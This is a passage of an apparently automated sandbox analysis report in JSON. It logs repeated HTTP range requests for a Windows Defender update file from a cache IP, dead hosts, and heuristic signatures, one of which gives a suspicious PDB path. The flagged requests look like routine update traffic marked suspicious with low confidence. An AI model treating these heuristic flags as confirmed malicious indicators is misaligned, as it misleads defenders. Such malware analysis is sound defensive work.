"data": "GET /c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nRange: bytes=184025088-184549375\r\nUser-Agent: Microsoft-Delivery-Optimization/10.0\r\nMS-CV: fnvG3Tym6ka/nxlZ.2.0.0.10.2.7.1.1.12\r\nContent-Length: 0\r\nHost: 14.102.231.204\r\n\r\n",
"uri": "http://14.102.231.204/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com",
"body": "",
"path": "/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com",
"user-agent": "Microsoft-Delivery-Optimization/10.0",
"version": "1.1",
"method": "GET",
"first_seen": 1763196506.689561
},
{
"count": 1,
"host": "14.102.231.204",
"port": 80,
"data": "GET /c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nRange: bytes=184025088-184549375\r\nUser-Agent: Microsoft-Delivery-Optimization/10.0\r\nMS-CV: fnvG3Tym6ka/nxlZ.2.0.0.10.2.7.1.1.13\r\nContent-Length: 0\r\nHost: 14.102.231.204\r\n\r\n",
"uri": "http://14.102.231.204/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com",
"body": "",
"path": "/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com",
"user-agent": "Microsoft-Delivery-Optimization/10.0",
"version": "1.1",
"method": "GET",
"first_seen": 1763196511.930116
},
{
"count": 1,
"host": "14.102.231.204",
"port": 80,
"data": "GET /c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nRange: bytes=141557760-142606335\r\nUser-Agent: Microsoft-Delivery-Optimization/10.0\r\nMS-CV: fnvG3Tym6ka/nxlZ.2.0.0.10.2.7.1.1.14\r\nContent-Length: 0\r\nHost: 14.102.231.204\r\n\r\n",
"uri": "http://14.102.231.204/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com",
"body": "",
"path": "/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com",
"user-agent": "Microsoft-Delivery-Optimization/10.0",
"version": "1.1",
"method": "GET",
"first_seen": 1763196513.61488
},
{
"count": 1,
"host": "14.102.231.204",
"port": 80,
"data": "GET /c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nRange: bytes=186646528-187695103\r\nUser-Agent: Microsoft-Delivery-Optimization/10.0\r\nMS-CV: fnvG3Tym6ka/nxlZ.2.0.0.10.2.7.1.1.15\r\nContent-Length: 0\r\nHost: 14.102.231.204\r\n\r\n",
"uri": "http://14.102.231.204/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com",
"body": "",
"path": "/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com",
"user-agent": "Microsoft-Delivery-Optimization/10.0",
"version": "1.1",
"method": "GET",
"first_seen": 1763196518.467336
},
{
"count": 1,
"host": "14.102.231.204",
"port": 80,
"data": "GET /c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nRange: bytes=49283072-50331647\r\nUser-Agent: Microsoft-Delivery-Optimization/10.0\r\nMS-CV: fnvG3Tym6ka/nxlZ.2.0.0.10.2.7.1.1.16\r\nContent-Length: 0\r\nHost: 14.102.231.204\r\n\r\n",
"uri": "http://14.102.231.204/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com",
"body": "",
"path": "/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com",
"user-agent": "Microsoft-Delivery-Optimization/10.0",
"version": "1.1",
"method": "GET",
"first_seen": 1763196527.801806
},
{
"count": 1,
"host": "14.102.231.204",
"port": 80,
"data": "GET /c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nRange: bytes=88080384-89128959\r\nUser-Agent: Microsoft-Delivery-Optimization/10.0\r\nMS-CV: fnvG3Tym6ka/nxlZ.2.0.0.10.2.7.1.1.17\r\nContent-Length: 0\r\nHost: 14.102.231.204\r\n\r\n",
"uri": "http://14.102.231.204/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com",
"body": "",
"path": "/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com",
"user-agent": "Microsoft-Delivery-Optimization/10.0",
"version": "1.1",
"method": "GET",
"first_seen": 1763196530.808472
},
{
"count": 1,
"host": "14.102.231.204",
"port": 80,
"data": "GET /c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nRange: bytes=67108864-68157439\r\nUser-Agent: Microsoft-Delivery-Optimization/10.0\r\nMS-CV: fnvG3Tym6ka/nxlZ.2.0.0.10.2.7.1.1.18\r\nContent-Length: 0\r\nHost: 14.102.231.204\r\n\r\n",
"uri": "http://14.102.231.204/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com",
"body": "",
"path": "/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com",
"user-agent": "Microsoft-Delivery-Optimization/10.0",
"version": "1.1",
"method": "GET",
"first_seen": 1763196534.916552
},
{
"count": 1,
"host": "14.102.231.204",
"port": 80,
"data": "GET /c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nRange: bytes=69206016-70254591\r\nUser-Agent: Microsoft-Delivery-Optimization/10.0\r\nMS-CV: fnvG3Tym6ka/nxlZ.2.0.0.10.2.7.1.1.19\r\nContent-Length: 0\r\nHost: 14.102.231.204\r\n\r\n",
"uri": "http://14.102.231.204/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com",
"body": "",
"path": "/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com",
"user-agent": "Microsoft-Delivery-Optimization/10.0",
"version": "1.1",
"method": "GET",
"first_seen": 1763196540.195875
},
{
"count": 1,
"host": "14.102.231.204",
"port": 80,
"data": "GET /c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nRange: bytes=174063616-175112191\r\nUser-Agent: Microsoft-Delivery-Optimization/10.0\r\nMS-CV: fnvG3Tym6ka/nxlZ.2.0.0.10.2.7.1.1.20\r\nContent-Length: 0\r\nHost: 14.102.231.204\r\n\r\n",
"uri": "http://14.102.231.204/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com",
"body": "",
"path": "/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com",
"user-agent": "Microsoft-Delivery-Optimization/10.0",
"version": "1.1",
"method": "GET",
"first_seen": 1763196544.222606
},
{
"count": 1,
"host": "14.102.231.204",
"port": 80,
"data": "GET /c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nRange: bytes=158334976-159383551\r\nUser-Agent: Microsoft-Delivery-Optimization/10.0\r\nMS-CV: fnvG3Tym6ka/nxlZ.2.0.0.10.2.7.1.1.21\r\nContent-Length: 0\r\nHost: 14.102.231.204\r\n\r\n",
"uri": "http://14.102.231.204/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com",
"body": "",
"path": "/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com",
"user-agent": "Microsoft-Delivery-Optimization/10.0",
"version": "1.1",
"method": "GET",
"first_seen": 1763196549.495739
},
{
"count": 1,
"host": "14.102.231.204",
"port": 80,
"data": "GET /c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nRange: bytes=117440512-118489087\r\nUser-Agent: Microsoft-Delivery-Optimization/10.0\r\nMS-CV: fnvG3Tym6ka/nxlZ.2.0.0.10.2.7.1.1.22\r\nContent-Length: 0\r\nHost: 14.102.231.204\r\n\r\n",
"uri": "http://14.102.231.204/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com",
"body": "",
"path": "/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com",
"user-agent": "Microsoft-Delivery-Optimization/10.0",
"version": "1.1",
"method": "GET",
"first_seen": 1763196552.368131
},
{
"count": 1,
"host": "14.102.231.204",
"port": 80,
"data": "GET /c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nRange: bytes=188743680-189792255\r\nUser-Agent: Microsoft-Delivery-Optimization/10.0\r\nMS-CV: fnvG3Tym6ka/nxlZ.2.0.0.10.2.7.1.1.23\r\nContent-Length: 0\r\nHost: 14.102.231.204\r\n\r\n",
"uri": "http://14.102.231.204/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com",
"body": "",
"path": "/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com",
"user-agent": "Microsoft-Delivery-Optimization/10.0",
"version": "1.1",
"method": "GET",
"first_seen": 1763196558.853297
},
{
"count": 1,
"host": "14.102.231.204",
"port": 80,
"data": "GET /c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nRange: bytes=9437184-10485759\r\nUser-Agent: Microsoft-Delivery-Optimization/10.0\r\nMS-CV: fnvG3Tym6ka/nxlZ.2.0.0.10.2.7.1.1.24\r\nContent-Length: 0\r\nHost: 14.102.231.204\r\n\r\n",
"uri": "http://14.102.231.204/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com",
"body": "",
"path": "/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com",
"user-agent": "Microsoft-Delivery-Optimization/10.0",
"version": "1.1",
"method": "GET",
"first_seen": 1763196560.939378
},
{
"count": 1,
"host": "14.102.231.204",
"port": 80,
"data": "GET /c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nRange: bytes=2097152-3145727\r\nUser-Agent: Microsoft-Delivery-Optimization/10.0\r\nMS-CV: fnvG3Tym6ka/nxlZ.2.0.0.10.2.7.1.1.25\r\nContent-Length: 0\r\nHost: 14.102.231.204\r\n\r\n",
"uri": "http://14.102.231.204/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com",
"body": "",
"path": "/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com",
"user-agent": "Microsoft-Delivery-Optimization/10.0",
"version": "1.1",
"method": "GET",
"first_seen": 1763196567.906336
},
{
"count": 1,
"host": "14.102.231.204",
"port": 80,
"data": "GET /c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nRange: bytes=10485760-11534335\r\nUser-Agent: Microsoft-Delivery-Optimization/10.0\r\nMS-CV: fnvG3Tym6ka/nxlZ.2.0.0.10.2.7.1.1.26\r\nContent-Length: 0\r\nHost: 14.102.231.204\r\n\r\n",
"uri": "http://14.102.231.204/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com",
"body": "",
"path": "/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com",
"user-agent": "Microsoft-Delivery-Optimization/10.0",
"version": "1.1",
"method": "GET",
"first_seen": 1763196569.393942
},
{
"count": 1,
"host": "14.102.231.204",
"port": 80,
"data": "GET /c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nRange: bytes=85983232-87031807\r\nUser-Agent: Microsoft-Delivery-Optimization/10.0\r\nMS-CV: fnvG3Tym6ka/nxlZ.2.0.0.10.2.7.1.1.27\r\nContent-Length: 0\r\nHost: 14.102.231.204\r\n\r\n",
"uri": "http://14.102.231.204/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com",
"body": "",
"path": "/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com",
"user-agent": "Microsoft-Delivery-Optimization/10.0",
"version": "1.1",
"method": "GET",
"first_seen": 1763196578.651445
},
{
"count": 1,
"host": "14.102.231.204",
"port": 80,
"data": "GET /c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nRange: bytes=34603008-35651583\r\nUser-Agent: Microsoft-Delivery-Optimization/10.0\r\nMS-CV: fnvG3Tym6ka/nxlZ.2.0.0.10.2.7.1.1.28\r\nContent-Length: 0\r\nHost: 14.102.231.204\r\n\r\n",
"uri": "http://14.102.231.204/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com",
"body": "",
"path": "/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com",
"user-agent": "Microsoft-Delivery-Optimization/10.0",
"version": "1.1",
"method": "GET",
"first_seen": 1763196583.388901
},
{
"count": 1,
"host": "14.102.231.204",
"port": 80,
"data": "GET /c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nRange: bytes=167772160-168820735\r\nUser-Agent: Microsoft-Delivery-Optimization/10.0\r\nMS-CV: fnvG3Tym6ka/nxlZ.2.0.0.10.2.7.1.1.29\r\nContent-Length: 0\r\nHost: 14.102.231.204\r\n\r\n",
"uri": "http://14.102.231.204/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com",
"body": "",
"path": "/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com",
"user-agent": "Microsoft-Delivery-Optimization/10.0",
"version": "1.1",
"method": "GET",
"first_seen": 1763196589.177163
},
{
"count": 1,
"host": "14.102.231.204",
"port": 80,
"data": "GET /c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nRange: bytes=78643200-79691775\r\nUser-Agent: Microsoft-Delivery-Optimization/10.0\r\nMS-CV: fnvG3Tym6ka/nxlZ.2.0.0.10.2.7.1.1.30\r\nContent-Length: 0\r\nHost: 14.102.231.204\r\n\r\n",
"uri": "http://14.102.231.204/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com",
"body": "",
"path": "/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com",
"user-agent": "Microsoft-Delivery-Optimization/10.0",
"version": "1.1",
"method": "GET",
"first_seen": 1763196595.20742
},
{
"count": 1,
"host": "14.102.231.204",
"port": 80,
"data": "GET /c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nRange: bytes=38797312-39845887\r\nUser-Agent: Microsoft-Delivery-Optimization/10.0\r\nMS-CV: fnvG3Tym6ka/nxlZ.2.0.0.10.2.7.1.1.31\r\nContent-Length: 0\r\nHost: 14.102.231.204\r\n\r\n",
"uri": "http://14.102.231.204/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com",
"body": "",
"path": "/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com",
"user-agent": "Microsoft-Delivery-Optimization/10.0",
"version": "1.1",
"method": "GET",
"first_seen": 1763196600.930515
},
{
"count": 1,
"host": "14.102.231.204",
"port": 80,
"data": "GET /c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nRange: bytes=13631488-14680063\r\nUser-Agent: Microsoft-Delivery-Optimization/10.0\r\nMS-CV: fnvG3Tym6ka/nxlZ.2.0.0.10.2.7.1.1.32\r\nContent-Length: 0\r\nHost: 14.102.231.204\r\n\r\n",
"uri": "http://14.102.231.204/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com",
"body": "",
"path": "/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com",
"user-agent": "Microsoft-Delivery-Optimization/10.0",
"version": "1.1",
"method": "GET",
"first_seen": 1763196604.848249
},
{
"count": 1,
"host": "14.102.231.204",
"port": 80,
"data": "GET /c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nRange: bytes=201326592-202375167\r\nUser-Agent: Microsoft-Delivery-Optimization/10.0\r\nMS-CV: fnvG3Tym6ka/nxlZ.2.0.0.10.2.7.1.1.33\r\nContent-Length: 0\r\nHost: 14.102.231.204\r\n\r\n",
"uri": "http://14.102.231.204/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com",
"body": "",
"path": "/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com",
"user-agent": "Microsoft-Delivery-Optimization/10.0",
"version": "1.1",
"method": "GET",
"first_seen": 1763196611.138772
}
],
"dns": [],
"smtp": [],
"irc": [],
"dead_hosts": [
[
"199.232.210.172",
80
],
[
"184.24.98.54",
443
],
[
"150.171.28.12",
443
],
[
"135.232.92.34",
443
],
[
"23.209.193.217",
443
],
[
"23.62.41.126",
443
],
[
"72.153.5.137",
443
],
[
"23.218.90.51",
443
],
[
"23.58.95.152",
443
],
[
"199.232.210.172",
443
],
[
"72.153.5.129",
443
],
[
"52.109.44.110",
443
]
]
}
|
{}
|
[
{
"name": "stealth_network",
"description": "Network activity detected but not expressed in monitor API logs",
"categories": [
"stealth"
],
"severity": 1,
"weight": 1,
"confidence": 100,
"references": [],
"data": [
{
"ip": "52.109.44.110"
},
{
"ip": "72.153.5.129"
},
{
"ip": "23.218.90.51"
},
{
"ip": "72.153.5.137"
},
{
"ip": "23.62.41.126"
},
{
"ip": "23.209.193.217"
},
{
"ip": "135.232.92.34"
},
{
"ip": "150.171.28.12"
},
{
"ip": "184.24.98.54"
},
{
"ip": "199.232.210.172"
},
{
"ip": "23.58.95.152"
},
{
"ip": "23.58.95.138"
},
{
"ip": "13.107.246.48"
},
{
"ip": "20.190.146.38"
},
{
"ip": "104.91.59.106"
},
{
"ip": "104.91.59.130"
},
{
"ip": "14.102.231.204"
},
{
"ip": "23.38.50.202"
},
{
"ip": "52.123.129.14"
},
{
"ip": "23.212.254.112"
},
{
"ip": "104.46.162.226"
}
],
"new_data": [],
"alert": false,
"families": []
},
{
"name": "network_cnc_http",
"description": "HTTP traffic contains suspicious features which may be indicative of malware related traffic",
"categories": [
"network",
"c2"
],
"severity": 2,
"weight": 1,
"confidence": 30,
"references": [],
"data": [
{
"ip_hostname": "HTTP connection was made to an IP address rather than domain name"
},
{
"suspicious_request": "http://14.102.231.204/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com"
},
{
"suspicious_request": "http://14.102.231.204/filestreamingservice/files/a12f8523-7037-48b9-aaa7-73346b7380ac?P1=1763736695&P2=404&P3=2&P4=bIBIfS2rcYDybCt1Pos2qKRm307nN5GoD%2bzT5pUN2ITzpm4xSmEbFQEeg4z2YW5wWgNp%2bm40b6S8fLGuj07XzQ%3d%3d&cacheHostOrigin=msedge.b.tlu.dl.delivery.mp.microsoft.com"
}
],
"new_data": [],
"alert": false,
"families": []
},
{
"name": "network_http",
"description": "Performs some HTTP requests",
"categories": [
"network"
],
"severity": 2,
"weight": 1,
"confidence": 30,
"references": [],
"data": [
{
"url": "http://14.102.231.204/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com"
},
{
"url": "http://14.102.231.204/filestreamingservice/files/a12f8523-7037-48b9-aaa7-73346b7380ac?P1=1763736695&P2=404&P3=2&P4=bIBIfS2rcYDybCt1Pos2qKRm307nN5GoD%2bzT5pUN2ITzpm4xSmEbFQEeg4z2YW5wWgNp%2bm40b6S8fLGuj07XzQ%3d%3d&cacheHostOrigin=msedge.b.tlu.dl.delivery.mp.microsoft.com"
}
],
"new_data": [],
"alert": false,
"families": []
},
{
"name": "static_pe_pdbpath",
"description": "The PE file contains a suspicious PDB path",
"categories": [
"static"
],
"severity": 2,
"weight": 1,
"confidence": 80,
"references": [
"https://www.fireeye.com/blog/threat-research/2019/08/definitive-dossier-of-devilish-debug-details-part-one-pdb-paths-malware.html"
],
"data": [
{
"anomaly": "the pdb path contains a reference to a development path or term that may suggest a non-enterprise environment development/compilation"
},
{
"pdbpath": "C:\\Users\\lengo\\Desktop\\Spamming Work\\Duy\\PyApp\\workplace\\curl\\Dll1\\Release\\Dll1.pdb"
}
],
"new_data": [],
"alert": false,
"families": []
},
{
"name": "network_questionable_http_path",
"description": "Makes a suspicious HTTP request to a commonly exploitable directory with questionable file ext",
"categories": [
"network"
],
"severity": 3,
"weight": 1,
"confidence": 100,
"references": [],
"data": [
{
"url": "http://14.102.231.204/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com"
},
{
"url": "http://14.102.231.204/filestreamingservice/files/a12f8523-7037-48b9-aaa7-73346b7380ac?P1=1763736695&P2=404&P3=2&P4=bIBIfS2rcYDybCt1Pos2qKRm307nN5GoD%2bzT5pUN2ITzpm4xSmEbFQEeg4z2YW5wWgNp%2bm40b6S8fLGuj07XzQ%3d%3d&cacheHostOrigin=msedge.b.tlu.dl.delivery.mp.microsoft.com"
},
{
"url": "http://14.102.231.204/filestreamingservice/files/a12f8523-7037-48b9-aaa7-73346b7380ac?P1=1763736695&P2=404&P3=2&P4=bIBIfS2rcYDybCt1Pos2qKRm307nN5GoD%2bzT5pUN2ITzpm4xSmEbFQEeg4z2YW5wWgNp%2bm40b6S8fLGuj07XzQ%3d%3d&cacheHostOrigin=msedge.b.tlu.dl.delivery.mp.microsoft.com"
},
{
"url": "http://14.102.231.204/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com"
},
{
"url": "http://14.102.231.204/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com"
},
{
"url": "http://14.102.231.204/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com"
},
{
"url": "http://14.102.231.204/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com"
},
{
"url": "http://14.102.231.204/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com"
},
{
"url": "http://14.102.231.204/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com"
},
{
"url": "http://14.102.231.204/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com"
},
{
